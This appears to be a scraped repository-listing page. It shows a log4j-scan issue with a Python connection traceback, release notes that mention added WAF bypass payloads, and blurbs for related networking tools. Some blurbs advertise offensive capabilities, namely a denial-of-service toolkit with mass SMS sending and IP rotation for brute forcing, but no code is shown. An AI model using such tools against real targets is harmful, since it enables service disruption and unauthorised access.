    Traceback (most recent call last): File "/usr/local/lib/python3.8/dist-packages/requests/adapters.py", line 439, in send resp = conn.urlopen( File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 719, in urlopen retries = retries.increment( File "/usr/lib/python3/dist-packages/urllib3/util/retry.py", line 400, in increment raise six.reraise(type(error), error, _stacktrace) File "/usr/lib/python3/dist-packages/six.py", line 702, in reraise raise value.with_traceback(tb) File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 665, in urlopen httplib_response = self._make_request( File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 376, in _make_request self._validate_conn(conn) File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 996, in validate_conn conn.connect() File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 366, in connect self.sock = ssl_wrap_socket( File "/usr/lib/python3/dist-packages/urllib3/util/ssl.py", line 370, in ssl_wrap_socket return context.wrap_socket(sock, server_hostname=server_hostname) File "/usr/lib/python3.8/ssl.py", line 500, in wrap_socket return self.sslsocket_class._create( File "/usr/lib/python3.8/ssl.py", line 1040, in _create self.do_handshake() File "/usr/lib/python3.8/ssl.py", line 1309, in do_handshake self._sslobj.do_handshake() urllib3.exceptions.ProtocolError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last): File "log4j-scan.py", line 412, in main() File "log4j-scan.py", line 382, in main dns_callback = Interactsh() File "log4j-scan.py", line 239, in init self.register() File "log4j-scan.py", line 247, in register res = self.session.post( File "/usr/local/lib/python3.8/dist-packages/requests/sessions.py", line 578, in post return self.request('POST', url, data=data, json=json, **kwargs) File "/usr/local/lib/python3.8/dist-packages/requests/sessions.py", line 530, in request resp = self.send(prep, **send_kwargs) File "/usr/local/lib/python3.8/dist-packages/requests/sessions.py", line 643, in send r = adapter.send(request, **kwargs) File "/usr/local/lib/python3.8/dist-packages/requests/adapters.py", line 498, in send raise ConnectionError(err, request=request) requests.exceptions.ConnectionError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))

    opened by GiuBravo 1
Releases(v.1.1.0)
  • v.1.1.0(Oct 20, 2022)

  • v1.0.1(Dec 25, 2021)

    • [x] Added additional 15 community-provided WAF bypass payloads (Total payloads: 23 payloads).
    • [x] Added additional common default POST parameters.
    • [x] Added --custom-waf-bypass-payload to add user-defined custom WAF bypass payload.
    • [x] Fixed a minor exception when "Referer" is not set on the headers-file list.
    • [x] Typo and PEP8 related clean-ups.
    Source code(tar.gz)
    Source code(zip)
  • v1.0.0(Dec 25, 2021)

Owner
FullHunt
Expose Your Attack Surface
FullHunt
Aiotor - a pool of proxies, shifting on each request

Aiotor - a pool of proxies, shifting on each request

Leon 32 Dec 26, 2022
Easy to use gRPC-web client in python

pyease-grpc Easy to use gRPC-web client in python Tutorial This package provides a requests like interface to make calls to gRPC-Web servers.

Sudipto Chandra 4 Dec 03, 2022
EUserv - A Python script which can help you renew your free EUserv IPv6 VPS

English | 简体中文 This project comes from https://github.com/a-beam-of-light/eu_ex

阿两 0 Jan 06, 2022
User-friendly packet captures

capture-packets: User-friendly packet captures Please read before using All network traffic occurring on your machine is captured (unless you specify

Seth Michael Larson 2 Feb 05, 2022
Truetool - A TrueCharts automatic and bulk update utility

truetool A easy tool for frequently used TrueNAS SCALE CLI utilities. Previously

TrueCharts 125 Jan 04, 2023
Nexum is an open-source, remote administration tool written in Python 3

A full-featured remote administration tool written in Python 3. The goal of this project is to make the use of a remote administration tool as simple

z3phyrus 2 Nov 26, 2021
A TCP Chatroom built with python and TCP/IP sockets, consisting of a server and multiple clients which can connect with the server and chat with each other.

A TCP Chatroom built with python and TCP/IP sockets, consisting of a server and multiple clients which can connect with the server and chat with each other. It also provides an Admin role with featur

3 May 22, 2022
Python 3 tool for finding unclaimed groups on Roblox. Supports multi-threading, multi-processing and HTTP proxies.

roblox-group-scanner Python 3 tool for finding unclaimed groups on Roblox. Supports multi-threading, multi-processing and HTTP proxies. Usage usage: s

h0nda 43 May 11, 2022
Modern Denial-of-service ToolKit for python

💣 Impulse Modern Denial-of-service ToolKit 💻 Main window 📡 Methods: Method Target Description SMS PHONE Sends a massive amount of SMS messages and

1 Nov 29, 2021
Netwalk is a Python library to discover, parse, analyze and change Cisco switched networks

Netwalk is a Python library born out of a large remadiation project aimed at making network device discovery and management as fast and painless as possible.

38 Nov 07, 2022
Ping IP addresses and domains in parallel to find the accessible and inaccessible ones.

🚀 IPpy Parallel testing of IP addresses and domains in python. Reads IP addresses and domains from a CSV file and gives two lists of accessible and i

Shivam Mathur 54 May 21, 2022
A SOCKS proxy server implemented with the powerful python cooperative concurrency framework asyncio.

asyncio-socks-server A SOCKS proxy server implemented with the powerful python cooperative concurrency framework asyncio. Features Supports both TCP a

Amaindex 164 Dec 30, 2022
A simple framwork to streamline the Domain Adaptation training process.

FastDA Introduction This is a simple framework for domain adaptation training. You can use it to build your own training process. It heavily relies on

Vincent Zhang 7 Nov 22, 2022
Burp Extension that copies a request and builds a FFUF skeleton

ffuf is gaining a lot of traction within the infosec community as a fast portable web fuzzer. It has been compared and aligned (kinda) to Burp's Intruder functionality. Thus, Copy As FFUF is trying t

Desmond Miles 81 Dec 22, 2022
🔥 Minimal performant package to asynchronously make GET requests.

Minimal performant package to asynchronously make GET requests without any dependencies other than asyncio.

Yannick Perrenet 1 Jun 01, 2022
GlokyPortScannar is a really fast tool to scan TCP ports implemented in Python.

GlokyPortScannar is a really fast tool to scan TCP ports implemented in Python. Installation: This program requires Python 3.9. Linux

gl0ky 5 Jun 25, 2022
WARP+ uses Cloudflare’s virtual private backbone, known as Argo, to achieve higher speeds and ensure your connection is encrypted across the long haul of the Internet

WARP+ uses Cloudflare’s virtual private backbone, known as Argo, to achieve higher speeds and ensure your connection is encrypted across the long haul of the Internet

Rivane Rasetiansyah 3 Apr 01, 2022
An advanced real time threat intelligence framework to identify threats and malicious web traffic on the basis of IP reputation and historical data.

ARTIF is a new advanced real time threat intelligence framework built that adds another abstraction layer on the top of MISP to identify threats and malicious web traffic on the basis of IP reputatio

CRED 225 Dec 31, 2022
netpy - more than implementation of netcat 🐍🔥

netpy - more than implementation of netcat 🐍🔥

Mahmoud S. ElGammal 1 Jan 26, 2022
A Python library to utilize AWS API Gateway's large IP pool as a proxy to generate pseudo-infinite IPs for web scraping and brute forcing.

A Python library to utilize AWS API Gateway's large IP pool as a proxy to generate pseudo-infinite IPs for web scraping and brute forcing.

George O 929 Jan 01, 2023